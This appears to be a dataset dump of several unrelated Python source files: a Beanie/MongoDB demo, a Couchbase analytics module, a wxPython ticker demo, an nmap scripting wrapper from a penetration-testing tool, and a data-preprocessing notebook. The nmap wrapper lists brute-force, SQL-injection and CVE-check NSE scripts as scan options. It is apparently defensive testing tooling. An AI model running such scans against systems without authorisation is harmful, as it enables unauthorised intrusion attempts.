def with_new_path(self, new_path: Path) -> "ProvidesSymlink":
# pyre-fixme[16]: `RequirePath` has no attribute `target`.
return self.__class__(new_path, self.req.target)
class ProvidesDoNotAccess(ProvidesPath):
def __init__(self, path: Path) -> None:
super().__init__(req=_RequireDoNotAccess(path=path))
class ProvidesGroup(Provider):
def __init__(self, groupname: str) -> None:
super().__init__(req=RequireGroup(groupname))
class ProvidesUser(Provider):
def __init__(self, username: str) -> None:
super().__init__(req=RequireUser(username))
| 30.353933
| 78
| 0.719785
|
4a0e97d47e68a0679bcdf8ee166f3b80139634a3
| 7,361
|
py
|
Python
|
python_examples/examples/databases/readme_beanie_example.py
|
BurnySc2/tools
|
f2b0f4450fb30cff61d390b222f561c26fd2324b
|
[
"MIT"
] | null | null | null |
python_examples/examples/databases/readme_beanie_example.py
|
BurnySc2/tools
|
f2b0f4450fb30cff61d390b222f561c26fd2324b
|
[
"MIT"
] | 10
|
2021-12-22T19:48:26.000Z
|
2022-03-31T13:22:47.000Z
|
python_examples/examples/databases/readme_beanie_example.py
|
BurnySc2/tools
|
f2b0f4450fb30cff61d390b222f561c26fd2324b
|
[
"MIT"
] | null | null | null |
"""
https://github.com/roman-right/beanie/
https://roman-right.github.io/beanie/
MongoDB GUI Interface: Robo 3T
"""
import asyncio
import sys
from typing import ForwardRef, List
import motor
from beanie import Document, init_beanie
from beanie.odm.operators.update.general import Set
from loguru import logger
from pydantic import Field
from pymongo.errors import ServerSelectionTimeoutError
# Queries can be cached https://roman-right.github.io/beanie/tutorial/cache/
class Author(Document):
name: str
birth_year: int
class Publisher(Document):
name: str
founded_year: int
class Book(Document):
name: str
release_year: int
author: Author
publisher: Publisher
# BookInventory is defined later so we have to use ForwardRef
ForwardRefBookInventory = ForwardRef('BookInventory')
class Library(Document):
name: str
address: str
books: List[ForwardRefBookInventory] = Field(default_factory=list) # type: ignore
class BookInventory(Document):
amount: int
book: Book
library: Library
Library.update_forward_refs()
# pylint: disable=R0914
# pylint: disable=R0915
async def test_database_with_beanie():
# Embedded pure-python dict based dictionary
client = motor.motor_asyncio.AsyncIOMotorClient('mongodb://localhost:27017')
# 1) Create tables
try:
await init_beanie(database=client.db_name, document_models=[Author, Publisher, Book, Library, BookInventory])
except ServerSelectionTimeoutError:
logger.error(
"You can run mongodb by running: 'docker run --rm -d -p 27017-27019:27017-27019 --name mongodb mongo:5.0.0'",
)
sys.exit(1)
# Clear for reuse
await Book.find_all().delete()
await Author.find_all().delete()
await Publisher.find_all().delete()
await Library.find_all().delete()
await BookInventory.find_all().delete()
# 2) Fill tables
author_1 = Author(name='J. R. R. Tolkien', birth_year=1892)
author_2 = Author(name='Harper Lee', birth_year=1926)
author_3 = Author(name='George Orwell', birth_year=1903)
await author_1.insert()
# Alternatively:
await author_2.create()
await Author.insert_many([
author_3,
])
publisher_1 = Publisher(name='Aufbau-Verlag', founded_year=1945)
publisher_2 = Publisher(name='Hoffmann und Campe', founded_year=1781)
publisher_3 = Publisher(name='Heyne Verlag', founded_year=1934)
await Publisher.insert_many([
publisher_1,
publisher_2,
publisher_3,
])
book_1 = Book(
name='The Lord of the Rings',
release_year=1954,
author=await Author.find_one(Author.name == author_1.name),
publisher=await Publisher.find_one(Publisher.name == publisher_1.name)
)
book_2 = Book(
name='To kill a Mockingbird',
release_year=1960,
author=await Author.find_one(Author.name == author_2.name),
publisher=await Publisher.find_one(Publisher.name == publisher_1.name)
)
book_3 = Book(
name='Nineteen Eighty-Four',
release_year=1949,
author=await Author.find_one(Author.name == author_3.name),
publisher=await Publisher.find_one(Publisher.name == publisher_3.name)
)
book_4 = Book(
name='This book was not written',
release_year=2100,
author=await Author.find_one(Author.name == author_3.name),
publisher=await Publisher.find_one(Publisher.name == publisher_3.name)
)
await Book.insert_many([
book_1,
book_2,
book_3,
book_4,
])
library_1 = Library(name='New York Public Library', address='224 East 125th Street', books=[])
library_2 = Library(name='California State Library', address='900 N Street', books=[])
await library_1.save()
await library_2.save()
library_inventory_1 = BookInventory(
book=await Book.find_one(Book.name == book_3.name),
library=await Library.find_one(Library.name == library_1.name),
amount=40
)
library_inventory_2 = BookInventory(
book=await Book.find_one(Book.name == book_2.name),
library=await Library.find_one(Library.name == library_1.name),
amount=15
)
library_inventory_3 = BookInventory(
book=await Book.find_one(Book.name == book_1.name),
library=await Library.find_one(Library.name == library_2.name),
amount=25
)
library_inventory_4 = BookInventory(
book=await Book.find_one(Book.name == book_2.name),
library=await Library.find_one(Library.name == library_2.name),
amount=30
)
# Add library_inventory, which returns the inserted objects (or ids with insert_many
library_inventory_1 = await library_inventory_1.save()
library_inventory_2 = await library_inventory_2.save()
# Add them to library_1.books
library_1.books = [library_inventory_1, library_inventory_2]
# Save changes
_library_1 = await library_1.save()
library_inventory_3 = await library_inventory_3.save()
library_inventory_4 = await library_inventory_4.save()
library_2.books = [library_inventory_3, library_inventory_4]
_library_2 = await library_2.save()
# 3) Select books
# https://docs.mongoengine.org/guide/querying.html#query-operators
async for book in Book.find(Book.release_year < 1960): # pylint: disable=E1133
logger.info(f'Found books released before 1960: {book}')
# Alternatively with mongodb syntax
# async for book in Book.find({"release_year": {"$lt": 1960}}):
# logger.info(f'Found books released before 1960: {book}')
# 4) Update books
assert await Book.find(Book.release_year < 1960).count() == 2
await Book.find(Book.release_year < 1960).update(Set({Book.release_year: 1970}))
# Alternatively with mongodb syntax
# await Book.find({"release_year": {"$lt": 1960}}).update({"$set": {"release_year": 1970}})
assert await Book.find(Book.release_year < 1960).count() == 0
# 5) Delete books
assert await Book.find(Book.name == 'This book was not written').count() == 1
await Book.find(Book.name == 'This book was not written').delete()
assert await Book.find(Book.name == 'This book was not written').count() == 0
# 6) Get data from other tables
async for book in Book.find_all(): # pylint: disable=E1133
logger.info(f'Book ({book}) has author ({book.author}) and publisher ({book.publisher})')
async for book_inventory in BookInventory.find_all(): # pylint: disable=E1133
logger.info(
f'Library {book_inventory.library} has book inventory ({book_inventory}) of book ({book_inventory.book})'
)
# 7) Join two tables and apply filter
# Find all books that are listed in libraries at least 25 times and where author was born before 1910
async for book_inventory in BookInventory.find( # pylint: disable=E1133
BookInventory.amount <= 25,
BookInventory.book.author.birth_year < 1910,
):
logger.info(
f'Book {book_inventory.book} is listed in {book_inventory.library} {book_inventory.amount} times and the author is {book_inventory.book.author}'
)
# 8) TODO: Migration
# 9) Clear table
await Book.find_all().delete()
if __name__ == '__main__':
asyncio.run(test_database_with_beanie())
| 34.237209
| 156
| 0.685641
|
4a0e981d3f4334808d6e47286af28f91d922800d
| 11,220
|
py
|
Python
|
couchbase_core/analytics.py
|
dfresh613/couchbase-python-client
|
c77af56490ed4c6d364fcf8fc1a374570de0239b
|
[
"Apache-2.0"
] | 1
|
2021-04-22T14:46:06.000Z
|
2021-04-22T14:46:06.000Z
|
couchbase_core/analytics.py
|
dfresh613/couchbase-python-client
|
c77af56490ed4c6d364fcf8fc1a374570de0239b
|
[
"Apache-2.0"
] | 3
|
2021-04-19T14:57:20.000Z
|
2021-05-14T12:29:50.000Z
|
couchbase_core/analytics.py
|
dfresh613/couchbase-python-client
|
c77af56490ed4c6d364fcf8fc1a374570de0239b
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2017, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from couchbase_core._libcouchbase import FMT_JSON
import couchbase_core.n1ql as N
import couchbase_core._libcouchbase as LCB
import time
from couchbase.exceptions import CouchbaseInternalException
try:
import urlparse
except:
import urllib.parse as urlparse
from typing import *
class AnalyticsQuery(N._N1QLQuery):
def __init__(self, querystr, *args, **kwargs):
"""
Create an Analytics Query object. This may be passed as the
`params` argument to :class:`AnalyticsRequest`.
:param querystr: The query string to execute
:param args: Positional placeholder arguments. These satisfy
the placeholder values for positional placeholders in the
query string, demarcated by ``?``.
:param kwargs: Named placeholder arguments. These satisfy
named placeholders in the query string, such as
``$name``, ``$email`` and so on. For the placeholder
values, omit the leading dollar sign (``$``).
Use positional parameters::
q = AnalyticsQuery("SELECT VALUE bw FROM breweries "
"bw WHERE bw.name = ?", 'Kona Brewing')
for row in cb.analytics_query(q, "127.0.0.1"):
print('Got {}'.format(str(row))
Use named parameters::
q = AnalyticsQuery("SELECT VALUE bw FROM breweries "
"bw WHERE bw.name = $brewery", brewery='Kona Brewing')
for row in cb.analytics_query(q, "127.0.0.1"):
print('Got {}'.format(str(row))
When using placeholders, ensure that the placeholder value is
the *unserialized* (i.e. native) Python value, not the JSON
serialized value. For example the query
``SELECT VALUE bw FROM breweries bw WHERE bw.name IN
['Kona Brewing','21st Amendment Brewery Cafe']``
can be rewritten using placeholders:
Correct::
AnalyticsQuery('SELECT VALUE bw FROM breweries bw WHERE bw.name IN ?',
['Kona Brewing', '21st Amendment Brewery Cafe'])
Incorrect::
AnalyticsQuery('SELECT VALUE bw FROM breweries bw WHERE bw.name IN ?',
"[\\"Kona Brewing\\",\\"21st Amendment Brewery Cafe\\"]")
Since the placeholders are serialized to JSON internally anyway.
"""
querystr = querystr.rstrip()
if not querystr.endswith(';'):
querystr += ';'
super(AnalyticsQuery, self).__init__(querystr,*args,**kwargs)
def update(self, *args, **kwargs):
if args:
if 'args' in self._body:
raise couchbase.exceptions.InvalidArgumentException(
"Cannot append positional args to existing query positional args")
else:
self._add_pos_args(args)
if kwargs:
overlapping_keys = set(kwargs.keys()) & set(self._body.keys())
if overlapping_keys:
raise couchbase.exceptions.InvalidArgumentException("Cannot overwrite named args in query")
else:
self._set_named_args(**kwargs)
def gen_iter(self, parent, itercls=None, **kwargs):
return (itercls or AnalyticsRequest)(self, parent, **kwargs)
class DeferredAnalyticsQuery(AnalyticsQuery):
def __init__(self, querystr, *args, **kwargs):
"""
Create a Deferred Analytics Query object. This may be passed as the
`params` argument to :class:`DeferredAnalyticsRequest`. Parameters
are the same as an AnalyticsQuery.
Please note this is a volatile API, which is subject to change in future.
:param querystr: The query string to execute
:param args: Positional placeholder arguments. These satisfy
the placeholder values for positional placeholders in the
query string, demarcated by ``?``.
:param kwargs: Named placeholder arguments. These satisfy
named placeholders in the query string, such as
``$name``, ``$email`` and so on. For the placeholder
values, omit the leading dollar sign (``$``).
"""
super(DeferredAnalyticsQuery, self).__init__(querystr, *args, **kwargs)
self.set_option("mode", "async")
self._timeout = None
@property
def timeout(self):
return self._timeout
@timeout.setter
def timeout(self, value):
self._timeout = value
def gen_iter(self, parent, itercls=None, **kwargs):
return (itercls or DeferredAnalyticsRequest)(self, parent, **kwargs)
class AnalyticsRequest(N.N1QLRequest):
def __init__(self, params, parent):
"""
Object representing the execution of the request on the
server.
.. warning::
You should typically not call this constructor by
yourself, rather use the :meth:`~.Bucket.analytics_query`
method (or one of its async derivatives).
:param params: An :class:`AnalyticsQuery` object.
:param parent: The parent :class:`~.couchbase_core.client.Client` object
To actually receive results of the query, iterate over this
object.
"""
super(AnalyticsRequest, self).__init__(params, parent)
def _submit_query(self):
return self._parent._cbas_query(self._params.encoded)
class DeferredAnalyticsRequest(AnalyticsRequest):
def __init__(self, # type: DeferredAnalyticsRequest
params, # type: DeferredAnalyticsQuery
parent, # type: couchbase_core.client.Client
timeout = None, # type: float
interval = None # type: float
):
# type: (...) -> None
"""
Object representing the execution of a deferred request on the
server.
Please note this is a volatile API, which is subject to change in future.
.. warning::
You should typically not call this constructor by
yourself, rather use the :meth:`~.Bucket.analytics_query`
method (or one of its async derivatives).
:param params: An :class:`DeferredAnalyticsQuery` object.
:param parent: The parent :class:`~.couchbase_core.client.Client` object.
:param timeout: Timeout in seconds.
:param interval: Interval in seconds for deferred polling.
To actually receive results of the query, iterate over this
object.
"""
handle_req = AnalyticsRequest(params, parent)
handle = handle_req.meta.get('handle')
if not handle:
raise CouchbaseInternalException("Endpoint does not support deferred queries")
self.parent = parent
self._final_response = None
self.finish_time = time.time() + (timeout if timeout else params._timeout)
self.handle_host=urlparse.urlparse(handle)
self.interval = interval or 10
super(DeferredAnalyticsRequest,self).__init__(params,parent)
def _submit_query(self):
return {None:self.final_response()}
def _is_ready(self):
"""
Return True if and only if final result has been received, optionally blocking
until this is the case, or the timeout is exceeded.
This is a synchronous implementation but an async one can
be added by subclassing this.
:return: True if ready, False if not
"""
while not self.finish_time or time.time() < self.finish_time:
result=self._poll_deferred()
if result=='success':
return True
if result=='failed':
raise couchbase.exceptions.InternalException("Failed exception")
time.sleep(self.interval)
raise couchbase.exceptions.TimeoutException("Deferred query timed out")
class MRESWrapper:
def __init__(self, response):
self.response=response
if response.value:
self.iter=iter(response.value if isinstance(response.value,list) else [response.value])
else:
self.iter=iter([])
def __getattr__(self, item):
return getattr(self.response,item)
@property
def done(self):
return not len(self.fetch(None))
def fetch(self, mres):
result = next(self.iter,None)
return [result] if result else []
def _poll_deferred(self):
status = "pending"
response_value = {}
try:
response = self.parent._http_request(type=LCB.LCB_HTTP_TYPE_ANALYTICS, method=LCB.LCB_HTTP_METHOD_GET,
path=self.handle_host.path, response_format=FMT_JSON,
host=self._to_host_URI(self.handle_host))
response_value = response.value
status = response_value.get('status')
except Exception as e:
pass
if status == 'failed':
raise couchbase.exceptions.InternalException("Deferred Query Failed")
if status == 'success':
response_handle = response_value.get('handle')
if not response_handle:
raise couchbase.exceptions.InternalException("Got success but no handle from deferred query response")
try:
parsed_response_handle = urlparse.urlparse(response_handle)
except Exception as e:
raise couchbase.exceptions.InternalException("Got invalid url: {}".format(e))
final_response = self.parent._http_request(type=LCB.LCB_HTTP_TYPE_ANALYTICS,
method=LCB.LCB_HTTP_METHOD_GET,
path=parsed_response_handle.path,
host=self._to_host_URI(parsed_response_handle),
response_format=FMT_JSON)
self._final_response = DeferredAnalyticsRequest.MRESWrapper(final_response)
return status
@staticmethod
def _to_host_URI(parsed_response_handle):
host_URI = "{}://{}:{}".format(parsed_response_handle.scheme, parsed_response_handle.hostname,
parsed_response_handle.port)
return host_URI
def final_response(self, default=None):
if self._final_response or self._is_ready():
return self._final_response
return default
@property
def raw(self):
return self.final_response()
| 38.689655
| 118
| 0.61934
|
4a0e9833c0214f86eddba984c7f219d3e67cddeb
| 5,169
|
py
|
Python
|
widgets/Ticker.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 3
|
2018-03-19T07:57:10.000Z
|
2021-07-05T08:55:14.000Z
|
widgets/Ticker.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 6
|
2020-03-24T15:40:18.000Z
|
2021-12-13T19:46:09.000Z
|
widgets/Ticker.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 4
|
2018-03-29T21:59:55.000Z
|
2019-12-16T14:56:38.000Z
|
#!/usr/bin/env python
import wx
from wx.lib.ticker import Ticker
import wx.lib.colourselect as csel #for easy color selection
#----------------------------------------------------------------------
class TestPanel(wx.Panel):
    """Demo panel hosting a wx.lib.ticker.Ticker plus widgets that drive it.

    The controls let the user edit the scrolling text, foreground and
    background colours, font, scroll direction, frames per second and
    pixels moved per frame.
    """

    def __init__(self, parent, log):
        self.log = log
        wx.Panel.__init__(self, parent, -1)

        self.ticker = Ticker(self)

        # Controls for ...controlling... the ticker.
        self.txt = wx.TextCtrl(self, value="I am a scrolling ticker!!!!", size=(200,-1))
        wx.CallAfter(self.txt.SetInsertionPoint, 0)
        txtl = wx.StaticText(self, label="Ticker text:")
        fgb = csel.ColourSelect(self, -1, colour=self.ticker.GetForegroundColour())
        fgl = wx.StaticText(self, label="Foreground Color:")
        bgb = csel.ColourSelect(self, -1, colour=self.ticker.GetBackgroundColour())
        bgl = wx.StaticText(self, label="Background Color:")
        fontb = wx.Button(self, label="Change")
        self.fontl = wx.StaticText(self)
        dirb = wx.Button(self, label="Switch")
        self.dirl = wx.StaticText(self)
        fpsl = wx.StaticText(self, label="Frames per Second:")
        fps = wx.Slider(self, value=self.ticker.GetFPS(), minValue=1, maxValue=100,
                        size=(150,-1),
                        style=wx.SL_HORIZONTAL|wx.SL_AUTOTICKS|wx.SL_LABELS)
        fps.SetTickFreq(5)
        ppfl = wx.StaticText(self, label="Pixels per frame:")
        ppf = wx.Slider(self, value=self.ticker.GetPPF(), minValue=1, maxValue=10,
                        size=(150,-1),
                        style=wx.SL_HORIZONTAL|wx.SL_AUTOTICKS|wx.SL_LABELS)

        # Do layout
        sz = wx.FlexGridSizer(cols=2, hgap=4, vgap=4)

        sz.Add(txtl, flag=wx.ALIGN_CENTER_VERTICAL)
        sz.Add(self.txt, flag=wx.ALIGN_CENTER_VERTICAL)

        sz.Add(fgl, flag=wx.ALIGN_CENTER_VERTICAL)
        sz.Add(fgb, flag=wx.ALIGN_CENTER_VERTICAL)

        sz.Add(bgl, flag=wx.ALIGN_CENTER_VERTICAL)
        sz.Add(bgb, flag=wx.ALIGN_CENTER_VERTICAL)

        sz.Add(self.fontl, flag=wx.ALIGN_CENTER_VERTICAL)
        sz.Add(fontb, flag=wx.ALIGN_CENTER_VERTICAL)

        sz.Add(self.dirl, flag=wx.ALIGN_CENTER_VERTICAL)
        sz.Add(dirb, flag=wx.ALIGN_CENTER_VERTICAL)

        sz.Add(fpsl, flag=wx.ALIGN_CENTER_VERTICAL)
        sz.Add(fps, flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)

        sz.Add(ppfl, flag=wx.ALIGN_CENTER_VERTICAL)
        sz.Add(ppf, flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)

        sz2 = wx.BoxSizer(wx.VERTICAL)
        sz2.Add(self.ticker, flag=wx.EXPAND|wx.ALL, border=5)
        sz2.Add(sz, flag=wx.EXPAND|wx.ALL, proportion=1, border=25)
        self.SetSizer(sz2)
        sz2.SetSizeHints(self)

        # Bind events
        self.Bind(wx.EVT_BUTTON, self.OnChangeTickDirection, dirb)
        self.Bind(wx.EVT_BUTTON, self.OnChangeTickFont, fontb)
        self.Bind(wx.EVT_TEXT, self.OnText, self.txt)
        self.Bind(csel.EVT_COLOURSELECT, self.ChangeTickFGColor, fgb)
        self.Bind(csel.EVT_COLOURSELECT, self.ChangeTickBGColor, bgb)
        self.Bind(wx.EVT_SCROLL, self.ChangeFPS, fps)
        self.Bind(wx.EVT_SCROLL, self.ChangePPF, ppf)

        # Set defaults
        self.SetTickDirection("rtl")
        self.SetTickFont(self.ticker.GetFont())
        self.ticker.SetText(self.txt.GetValue())

    def SetTickFont(self, font):
        """Sets ticker font, updates label"""
        self.ticker.SetFont(font)
        self.fontl.SetLabel("Font: %s"%(self.ticker.GetFont().GetFaceName()))
        self.Layout()

    def OnChangeTickFont(self, evt):
        # Open a font picker seeded with the ticker's current font.
        # NOTE(review): dlg is never Destroy()ed — wx dialogs normally need
        # an explicit Destroy(); confirm whether this leaks on some ports.
        fd = wx.FontData()
        fd.EnableEffects(False)
        fd.SetInitialFont(self.ticker.GetFont())
        dlg = wx.FontDialog(wx.GetTopLevelParent(self), fd)
        if dlg.ShowModal() == wx.ID_OK:
            data = dlg.GetFontData()
            self.SetTickFont(data.GetChosenFont())

    def SetTickDirection(self, dir):
        """Sets tick direction, updates label"""
        self.ticker.SetDirection(dir)
        self.dirl.SetLabel("Direction: %s"%(self.ticker.GetDirection()))

    def OnChangeTickDirection(self, dir):
        # Toggle between right-to-left and left-to-right scrolling.
        # ('dir' is actually the button event; it is never read here.)
        if self.ticker.GetDirection() == "rtl":
            self.SetTickDirection("ltr")
        else:
            self.SetTickDirection("rtl")

    def OnText(self, evt):
        """Live update of the ticker text"""
        self.ticker.SetText(self.txt.GetValue())

    def ChangeTickFGColor(self, evt):
        # Apply the colour chosen in the foreground ColourSelect button.
        self.ticker.SetForegroundColour(evt.GetValue())

    def ChangeTickBGColor(self, evt):
        # Apply the colour chosen in the background ColourSelect button.
        self.ticker.SetBackgroundColour(evt.GetValue())

    def ChangeFPS(self, evt):
        # Slider position is the new frames-per-second value.
        self.ticker.SetFPS(evt.GetPosition())

    def ChangePPF(self, evt):
        # Slider position is the new pixels-per-frame value.
        self.ticker.SetPPF(evt.GetPosition())

    def ShutdownDemo(self):
        # Stop the animation timer before the demo framework tears us down.
        self.ticker.Stop()
#----------------------------------------------------------------------
def runTest(frame, nb, log):
    """Entry point used by the demo runner: build and return the panel."""
    panel = TestPanel(nb, log)
    return panel
#----------------------------------------------------------------------

# The demo framework shows the hosted module's docstring as the overview.
overview = wx.lib.ticker.__doc__

if __name__ == '__main__':
    # Launch through the wxPython demo runner when executed directly.
    import sys,os
    import run
    run.main(['', os.path.basename(sys.argv[0])] + sys.argv[1:])
| 34.925676
| 88
| 0.609015
|
4a0e9a61c773c9d67f7e32efbe6d8e7fecec1e0e
| 6,846
|
py
|
Python
|
src/nmap_scripts.py
|
secdec/ADAPT
|
f9bd149b321830588df47e06b8b8e1db07ea9d7a
|
[
"Apache-2.0"
] | 183
|
2018-09-18T20:44:31.000Z
|
2021-11-09T11:20:14.000Z
|
src/nmap_scripts.py
|
secdec/ADAPT
|
f9bd149b321830588df47e06b8b8e1db07ea9d7a
|
[
"Apache-2.0"
] | 11
|
2019-01-30T17:21:38.000Z
|
2021-01-17T23:33:47.000Z
|
src/nmap_scripts.py
|
secdec/ADAPT
|
f9bd149b321830588df47e06b8b8e1db07ea9d7a
|
[
"Apache-2.0"
] | 49
|
2018-09-21T21:18:43.000Z
|
2022-03-10T12:47:04.000Z
|
#
# Automated Dynamic Application Penetration Testing (ADAPT)
#
# Copyright (C) 2018 Applied Visions - http://securedecisions.com
#
# Written by Siege Technologies - http://www.siegetechnologies.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import nmap
from pprint import pprint
def translate_url(url):
    """Reduce *url* to its bare hostname.

    Strips a leading ``https://`` or ``http://`` scheme, drops any path
    component, and removes a leading ``www.`` prefix.
    """
    for prefix in ("https://", "http://"):
        if url.startswith(prefix):
            url = url[len(prefix):]
            break
    host = url.split("/")[0]
    if host.startswith("www."):
        host = host[4:]
    return host
def find(data):
    """Recursively yield every value stored under a ``"script"`` key.

    Walks nested dicts and lists (as produced by python-nmap scan
    results). Input that has no ``.items()`` method is yielded back
    unchanged, mirroring the AttributeError fallback of the original.
    """
    try:
        pairs = data.items()
    except AttributeError:
        # Leaf value (not a mapping): hand it back as-is.
        yield data
        return
    for key, value in pairs:
        if key == "script":
            yield value
        elif isinstance(value, dict):
            for hit in find(value):
                yield hit
        elif isinstance(value, list):
            for element in value:
                for hit in find(element):
                    yield hit
class nmap_scripting():
    """Thin wrapper around python-nmap that runs NSE scripts on a target.

    By default only the ``http-methods`` script is enabled; the commented
    entries below catalogue other NSE scripts kept for future use.
    """

    def __init__(self, target, ports, scripts_to_run=None):
        # Build the "-pX,Y,Z" port argument only when ports were supplied.
        if(ports != None):
            self.port_values = "-p"+",".join(ports.split())
        else:
            self.port_values = ""
        # Reduce the target URL to a bare hostname for nmap.
        self.target = translate_url(target)
        self.nm = nmap.PortScanner()
        self.__valid_scripts = []
        if(scripts_to_run is None):
            # for current project goals only one script is run
            # The idea being that any future development or tests can
            # just call an nmap script and use its information
            self.__valid_scripts = [
                #"ssl-cert", # getthe target's ssl certificate
                #"ssl-ccs-injection", # determines if vulnerable to ccs injection (CVE-2014-0224)
                #"ssl-cert-intaddr", # reports any private ipv4 addrs in the ssl certificate
                #"ssl-dh-params", # Weak Diffe-Hellman handshake detection
                #"ssl-enum-ciphers", # Tries multiple ssl/tsl ciphers and ranks available
                #"ssl-heartbleed", # detects if app is vuln to heartbleed
                #"ssl-known-key", # checks to see if certificate has any known bad keys
                #"ssl-poodle", # checks if app is vuln to poodle
                #"sslv2-drown", # checks if app supports sslv2 and is vuln to drown
                #"sslv2", # checks if it supports older and outdated sslv2
                #"http-vuln-cve2006-3392", # checks for directory information given by Webmin
                #"http-vuln-cve2009-3960", # adobe XML external entity injection
                #"http-vuln-cve2010-0738", # checks if Jboss target is vuln to jmx console auth bypass
                #"http-vuln-cve2010-2861", # Directory draversal agains ColdFusion server
                #"http-vuln-cve2011-3192", # Detects DoS vuln on Apache systems
                #"http-vuln-cve2011-3368", # Checks Reverse Proxy Bypass on Apache
                #"http-vuln-cve2012-1823", # Checks for PHP-CGI vulns
                #"http-vuln-cve2013-0156", # Checks for Ruby object injections
                #"http-vuln-cve2013-6786", # Redirection and XXS
                #"http-vuln-cve2013-7091", # Zero data for local file retrieval
                #"http-vuln-cve2014-2126", # Cisco ASA privilege escalation vuln
                #"http-vuln-cve2014-2127", # Cisco ASA privilege escalation vuln
                #"http-vuln-cve2014-2128", # Cisco ASA privilege escalation vuln
                #"http-vuln-cve2014-2129", # Cisco ASA privilege escalation vuln
                #"http-vuln-cve2014-3704", # SQL Injecection for Drupal
                #"http-vuln-cve2014-8877", # Remote code injection for Wordpress
                #"http-vuln-cve2015-1427", # Remote code execution via API exploitation
                #"http-vuln-cve2015-1635", # Remote code execution on Microsoft systems
                #"http-vuln-cve2017-1001000", # Privilege escalation on Wordpress
                #"http-vuln-cve2017-5638", # Remote code execution for Apache Struts
                #"http-vuln-cve2017-5689", # Pivilege escaltion for Intel Active management
                #"http-vuln-cve2017-8917", # SQL injection for Joomla
                #"http-vuln-misfortune-cookie", # RomPager Cookie vuln
                #"http-vuln-wnr1000-creds", # Admin creds steal from WMR 1000 series
                #"http-adobe-coldfusion-apsa1301", # Auth bypass via adobe coldfusion
                #"http-affiliate-id", # grabs affiliate network information
                #"http-apache-negotiation", # enables mod_negociation,allows potential spidering
                #"http-apache-server-status", # attempts to retrieve apache server information
                #"http-aspnet-debug", # determines if service enabled aspnet debug mode
                #"http-auth", # get authentication scheme
                #"http-auth-finder", # spiders for getting http based auth
                #"http-awstatstotals-exec", # remote code execution in Awstats total
                #"http-axis2-dir-traversal", # directory traversal in for apache axis2
                #"http-backup-finder", # spidering attempt to discover duplicates/backup files
                #"http-brute", # basic brute force http auth attack
                #"http-chrono", # times page's responsivness
                #"http-cisco-anyconnect", # connects as cisco AnyClient and retrieves basic information
                #"http-coldfusion-subzero", # admin creds steal vial coldfusion vuln
                #"http-comments-displayer", # displays comments from pages
                #"http-config-backup", # searches for duplicates of system/server setup files
                #"http-cors", # tests for cross-origin resource sharing
                #"http-cross-domain-policy", # checks cross domain policy to expose overly permissive forms
                #"http-csrf", # detects csrf forgeries
                #"http-default-accounts", # tests for default accounts that may exist
                #"http-dlink-backdoor", # checks for a firmware vuln on some dlink routers
                #"http-dombased-xss", # uses the dom to leverage javascript
                #"http-domino-enum-passwords", # tries to use the hashed Domino passwords
                #"http-feed", # tries to get any rss information that may be present
                #"http-form-brute", # brute forces http form based authentication
                #"http-generator", # display's contents of generator metatab
                #"http-headers", # tries to get a head request for "/"
                #"http-joomla-brute", # brute force attack against joomla web CMS installations
                #"http-malware-host", # signature search for known compromises
                #"http-proxy-brute",
                #"http-sql-injection",
                "http-methods" # gets available methods from service (we only care about this for now)
                ]
        else:
            # Caller supplied an explicit script list: use it verbatim.
            for i in scripts_to_run:
                self.__valid_scripts.append(i)

    def run(self):
        # Launch nmap with one "--script <name>" per enabled script, then
        # extract every "script" result from the nested scan dictionary.
        results = self.nm.scan(self.target, arguments=self.port_values+" --script "+" --script ".join(self.__valid_scripts))
        return list(find(results))
| 47.213793
| 118
| 0.693982
|
4a0e9b291df7fa79b69f078f0de0c1d9ef76e8cd
| 3,178
|
py
|
Python
|
Data-Preprocessing/code.py
|
Pannu22/ga-learner-dsmp-repo
|
b36777df3a91e48e5bf8e484f42ddbed98754728
|
[
"MIT"
] | null | null | null |
Data-Preprocessing/code.py
|
Pannu22/ga-learner-dsmp-repo
|
b36777df3a91e48e5bf8e484f42ddbed98754728
|
[
"MIT"
] | null | null | null |
Data-Preprocessing/code.py
|
Pannu22/ga-learner-dsmp-repo
|
b36777df3a91e48e5bf8e484f42ddbed98754728
|
[
"MIT"
] | null | null | null |
# --------------
#Importing header files
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns

#Code starts here
# NOTE: `path` is injected by the hosting platform; it is not defined here.
data = pd.read_csv(path)

#Plotting Histogram
data['Rating'].hist()

# Ratings above 5 are invalid for this dataset; drop them and re-plot.
data = data[data['Rating']<=5]
data['Rating'].hist()
#Code ends here


# --------------
# code starts here

# Finding null values (absolute count and percentage per column)
total_null = data.isnull().sum()
percent_null = (total_null/data.isnull().count())*100
missing_data = pd.concat([total_null,percent_null],axis=1,keys=['Total','Percent'])
print(missing_data)

# Removing null values and re-checking
data = data.dropna()
total_null_1 = data.isnull().sum()
# BUG FIX: previously recomputed from the pre-drop `total_null`, so the
# "after" table showed stale counts; use the post-drop totals instead.
percent_null_1 = (total_null_1/data.isnull().count())*100
missing_data_1 = pd.concat([total_null_1,percent_null_1],axis=1,keys=['Total','Percent'])
print(missing_data_1)

# code ends here


# --------------
#Code starts here

# Rating of application in each category
sns.catplot(x="Category",y="Rating",data=data, kind="box", height = 10)
plt.xticks(rotation=90)

#Code ends here


# --------------
#Importing header files
